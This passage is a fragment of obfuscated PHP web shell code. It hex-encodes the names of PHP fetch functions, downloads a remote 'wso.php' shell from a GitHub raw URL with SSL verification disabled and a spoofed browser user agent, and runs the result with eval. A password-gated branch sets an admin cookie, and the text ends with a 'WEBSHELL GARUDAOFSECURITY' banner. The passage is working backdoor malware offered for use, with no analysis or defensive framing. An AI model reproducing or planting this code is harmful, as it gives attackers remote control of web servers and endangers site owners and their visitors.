0 '73747265616d5f6765745f636f6e74656e7473', # strea m_get_contents => 1 '66696c655f6765745f636f6e74656e7473', # fil e_g et_cont ents => 2 '6375726c5f65786563' # cur l_ex ec => 3 ); function hex2str($hex) { $str = ''; for ($i = 0; $i < strlen($hex); $i += 2) { $str .= chr(hexdec(substr($hex, $i, 2))); } return $str; } function geturlsinfo($destiny) { $belief = array( hex2str($GLOBALS['Array'][0]), hex2str($GLOBALS['Array'][1]), hex2str($GLOBALS['Array'][2]), hex2str($GLOBALS['Array'][3]) ); if (function_exists($belief[3])) { $ch = curl_init($destiny); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $love = $belief[3]($ch); curl_close($ch); return $love; } elseif (function_exists($belief[2])) { return $belief[2]($destiny); } elseif (function_exists($belief[0]) && function_exists($belief[1])) { $purpose = $belief[0]($destiny, "r"); $love = $belief[1]($purpose); fclose($purpose); return $love; } return false; } $destiny = 'https://raw.githubusercontent.com/Tituss22/ShellSukaBintang01/refs/heads/main/wso.php'; $dream = geturlsinfo($destiny); if ($dream !== false) { eval('?>' . $dream); } } else { if (isset($_POST['password'])) { $entered_key = $_POST['password']; $hashed_key = '$2y$10$JL6bpbc9NC2yESGLDAeXqec0MmX2Otl425y6xBCGlsiGQUuRgeb4m'; if (password_verify($entered_key, $hashed_key)) { setcookie('user_id', 'admin@sukabintang01', time() + 3600, '/'); header("Location: ".$_SERVER['PHP_SELF']); exit(); } } ?> WEBSHELL GARUDAOFSECURITY